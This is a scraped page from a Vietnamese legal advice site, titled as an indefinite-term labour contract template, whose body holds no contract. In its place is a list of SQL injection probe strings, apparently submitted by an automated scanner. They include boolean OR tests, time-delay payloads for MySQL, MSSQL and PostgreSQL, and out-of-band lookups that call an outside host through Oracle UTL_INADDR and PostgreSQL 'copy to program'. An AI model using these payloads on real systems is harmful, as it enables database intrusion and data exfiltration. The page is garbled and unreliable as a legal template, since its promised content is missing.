Bạn cần tư vấn Pháp luật?
Hãy gọi : 1900 6188
"Tổng đài tư vấn pháp luật 1900 6188" là dịch vụ tư vấn luật qua điện thoại của Công ty Luật VinaBiz
  • Tư vấn trực tuyến miễn phí
  • Đội ngũ Luật sư uy tín
  • Tư vấn 24/7
Luật sư tư vấn pháp luật online miễn phí đầu số 1900 6188

Mẫu hợp đồng lao động không xác định thời hạn

Cập nhật lần cuối lúc 14:55 ngày 18/08/2014

1
1
1
1
-1 OR 2+99-99-1=0+0+0+1 --
1'"
-1 OR 3+99-99-1=0+0+0+1 --
\
-1 OR 3*2<(0+5+99-99) --
1
-1 OR 3*2>(0+5+99-99) --
@@NG97y
-1 OR 2+378-378-1=0+0+0+1
JyI=
-1 OR 3+378-378-1=0+0+0+1
-1 OR 3*2<(0+5+378-378)
-1 OR 3*2>(0+5+378-378)
-1' OR 2+778-778-1=0+0+0+1 --
-1' OR 3+778-778-1=0+0+0+1 --
-1' OR 3*2<(0+5+778-778) --
-1' OR 3*2>(0+5+778-778) --
-1' OR 2+581-581-1=0+0+0+1 or '0C5mGcL9'='
-1' OR 3+581-581-1=0+0+0+1 or '0C5mGcL9'='
-1' OR 3*2<(0+5+581-581) or '0C5mGcL9'='
-1' OR 3*2>(0+5+581-581) or '0C5mGcL9'='
-1" OR 2+99-99-1=0+0+0+1 --
-1" OR 3+99-99-1=0+0+0+1 --
-1" OR 3*2<(0+5+99-99) --
-1" OR 3*2>(0+5+99-99) --
if(now()=sysdate(),sleep(8.312000000000001),0)/*'XOR(if(now()=sysdate(),sleep(8.312000000000001),0))OR'"XOR(if(now()=sysdate(),sleep(8.312000000000001),0))OR"*/
(select(0)from(select(sleep(12.468000000000001)))v)/*'+(select(0)from(select(sleep(12.468000000000001)))v)+'"+(select(0)from(select(sleep(12.468000000000001)))v)+"*/
-1; waitfor delay '0:0:12.468000000000001' --
-1); waitfor delay '0:0:4.156000000000001' --
1 waitfor delay '0:0:8.312000000000001' --
CqEewmvM'; waitfor delay '0:0:8.312000000000001' --
-1;select pg_sleep(12.468000000000001); --
-1);select pg_sleep(12.468000000000001); --
-1));select pg_sleep(12.468000000000001); --
CyXPbO9A';select pg_sleep(4.156000000000001); --
5MZMMUp9');select pg_sleep(8.312000000000001); --
tC0EOArE'));select pg_sleep(8.312000000000001); --
1||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5027.34060.8140b.1.bxss'||'.me')
'||UTL_INADDR.get_host_address('dns.'||'sqli.027931.34060-5028.34060.8140b.1.bxss'||'.me')||'
1;copy (select '') to program 'nslookup dns.sqli.\027931.34060-5029.34060.8140b.\1.bxss.me'
1';copy (select '') to program 'nslookup dns.sqli.\027931.34060-5032.34060.8140b.\1.bxss.me
114'

Tư vấn pháp luật online miễn phí đầu số 1900 6188

Đặt câu hỏi

Họ tên:
Email:
Tiêu đề: